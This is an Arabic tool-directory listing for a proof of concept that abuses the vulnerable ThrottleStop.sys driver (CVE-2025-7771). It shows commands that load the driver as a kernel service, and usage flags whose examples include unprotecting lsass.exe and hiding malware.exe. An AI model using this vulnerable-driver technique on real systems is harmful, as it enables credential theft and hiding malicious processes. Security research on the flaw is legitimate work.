Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-7771 — وصف بسيط لإثبات المفهوم (PoC) يستعرض الثغرة الأمنية في برنامج تشغيل ThrottleStop.sys، ويوضح إمكانيات القراءة والكتابة العشوائية للذاكرة الفعلية، بالإضافة إلى تحويل العناوين الافتراضية إلى فيزيائية باستخدام Superfetch. | Kitploit
أدوات/GitHubGitHub/xm0kht4r/cve-2025-7771
تصعيد الامتيازاتتحليل الثغرات الأمنيةما بعد الاستغلالتحليل البرمجيات الخبيثةالفريق الأحمراستغلال الملفات الثنائية
GitHubxm0kht4r/cve-2025-7771

CVE-2025-7771

وصف بسيط لإثبات المفهوم (PoC) يستعرض الثغرة الأمنية في برنامج تشغيل ThrottleStop.sys، ويوضح إمكانيات القراءة والكتابة العشوائية للذاكرة الفعلية، بالإضافة إلى تحويل العناوين الافتراضية إلى فيزيائية باستخدام Superfetch.

عرض المستودع
101منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-7771

PoC بسيط يوضح الثغرة في برنامج تشغيل ThrottleStop.sys، ويعرض قدرات قراءة وكتابة عشوائية للذاكرة الفعلية، بالإضافة إلى ترجمة العناوين من افتراضية إلى فيزيائية باستخدام Superfetch.

⚡ الاستخدام:

1. تسجيل خدمة:

قم بتشغيل cmd.exe بصلاحيات المسؤول، وقم بتسجيل خدمة برنامج تشغيل kernel مع نوع "kernel" وbinPath يشير إلى موقع برنامج التشغيل الضعيف.

root@kitploit:~
> sc create ThrottleStop binPath= <path> type= kernel`
> sc start ThrottleStop

الأوامر:

root@kitploit:~
  --protect   : Protect a process.
  --unprotect : Unprotect a potected process.
  --hide      : Hide a process.
  --unhide    : Unhide a process.
  --help      : Print help

أمثلة:

CVE-2025-7771.exe --protect notepad.exe أو CVE-2025-7771exe --protect 12345
CVE-2025-7771.exe --unprotect lsass.exe أو CVE-2025-7771.exe --unprotect 12345
CVE-2025-7771.exe --hide malware.exe أو CVE-2025-7771.exe --hide 12345

لإظهار عملية مخفية مرة أخرى، يمكنك استخدام الأمر --unhide مع تحديد عنوان eprocess الخاص بالعملية المخفية عبر '--eprocess': CVE-2025-7771.exe --unhide --eprocess 0xffffc207da1d9240

🔒 إخلاء المسؤولية

أنت مسؤول عن ضمان حصولك على التصريح المناسب قبل استخدام هذه الأداة. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام.

🤝 التعاون

هذا مشروع مستمر، المساهمات والاقتراحات مرحب بها! إذا كانت لديك أفكار أو تحسينات أو ترغب في التعاون، فلا تتردد في التواصل عبر: [email protected]

تنزيل الأداة